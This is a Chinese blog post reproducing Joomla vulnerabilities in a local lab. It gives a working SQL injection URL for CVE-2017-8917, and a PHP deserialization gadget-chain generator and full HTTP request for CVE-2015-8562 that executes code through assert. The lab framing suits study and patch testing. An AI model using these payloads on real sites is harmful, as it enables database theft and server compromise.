当前位置:网站首页>Joomla漏洞复现
Joomla漏洞复现
2022-08-10 04:37:00 【narukuuuu】
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现
Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。
这个有点长,还没搞懂脚本,明天再写
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞
漏洞原理:传送门
直接在kail中开环境,找了payload:
http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)
还是kail直接开环境
本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。
通过Joomla中的Gadget,可造成任意代码执行的结果。
影响版本:
Joomla 1.5.x, 2.x, and 3.x before 3.4.6
PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45
复现:
我们不带User-Agent头,先访问一次目标主页,记下服务端返回的Cookie:
用一下脚本生成poc
<?php
class JSimplepieFactory {
}
class JDatabaseDriverMysql {
}
class SimplePie {
var $sanitize;
var $cache;
var $cache_name_function;
var $javascript;
var $feed_url;
function __construct()
{
$this->feed_url = "phpinfo();JFactory::getConfig();exit;";
$this->javascript = 9999;
$this->cache_name_function = "assert";
$this->sanitize = new JDatabaseDriverMysql();
$this->cache = true;
}
}
class JDatabaseDriverMysqli {
protected $a;
protected $disconnectHandlers;
protected $connection;
function __construct()
{
$this->a = new JSimplepieFactory();
$x = new SimplePie();
$this->connection = 1;
$this->disconnectHandlers = [
[$x, "init"],
];
}
}
$a = new JDatabaseDriverMysqli();
$poc = serialize($a);
$poc = str_replace("\x00*\x00", '\\0\\0\\0', $poc);
echo "123}__test|{
$poc}\xF0\x9D\x8C\x86";
得到
将该数据构成User-Agent头并带上刚刚第一次的cookie一起发包
GET / HTTP/1.1
Host: host:8080
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cabfd193a7cc3d4f5d606acc35b17e3a=64e15809c82dd54e9fdf723a9342dd18
User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{
}s:21:"\0\0\0disconnectHandlers";a:1:{
i:0;a:2:{
i:0;O:9:"SimplePie":5:{
s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{
}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}4
Content-Length: 2
我们的代码得以执行
边栏推荐
- 安芯电子IPO过会:年营收4亿 汪良恩兄弟持股61.6%
- webrtc学习--webrtc桌面采集
- 【心理学·人物】第二期(学术X综艺)
- 2022年A特种设备相关管理(电梯)考试模拟100题及答案
- 虚假新闻检测论文阅读(七):A temporal ensembling based semi-supervised ConvNet for the detection of fake news
- 社区分享|货拉拉通过JumpServer纳管大规模云上资产
- 文献 | 关于心理活动符号学,你知道多少?
- 开发智能硬件过程中需要掌握的方法之经典
- SQLSERVER 2008 解析 Json 格式数据
- 线程(下):读写者模型\环形队列\线程池
猜你喜欢
2022G3 Boiler Water Treatment Exam Mock 100 Questions and Mock Exam
2022年T电梯修理考试题及模拟考试
万字总结:分布式系统的38个知识点
用.bat文件做Airtest脚本的多设备批量运行
Using the DatePicker date control, Prop being mutated: "placement" error occurs
60行从零开始自己动手写FutureTask是什么体验?
线程(上篇):线程的创建
基于 EasyCV 复现 DETR 和 DAB-DETR,Object Query 的正确打开方式
什么是“大小端字节序”存储模式?
微信公众号开发
随机推荐
BGP实验+选路+路由策略+OSPF
电流探头如何设置示波器参数
LeetCode 1297. 子串的最大出现次数
2022年起重机械指挥操作证考试题库及模拟考试
线程(上篇):线程的创建
ZZULIOJ:1018: 奇数偶数
webrtc学习--webrtc桌面采集
ZZULIOJ:1030: 判断直角三角形
PAC文件解释-转载 小胡子哥的个人网站
What is the relationship between legal representative and shareholders?
释放高通量算力价值潜能 JASMINER持续领跑 Web3 市场
RadiAnt DICOM Viewer 2022.1 Crack
网络层与数据链路层
西门子Step7和TIA软件“交叉引用”的使用
【u-boot】u-boot驱动模型分析(02)
【OpenCV图像处理5】图像的变换
webrtc学习--webrtc源码获取
ZZULIOJ:1019: 公园门票
2022/8/9
JavsSE => 多态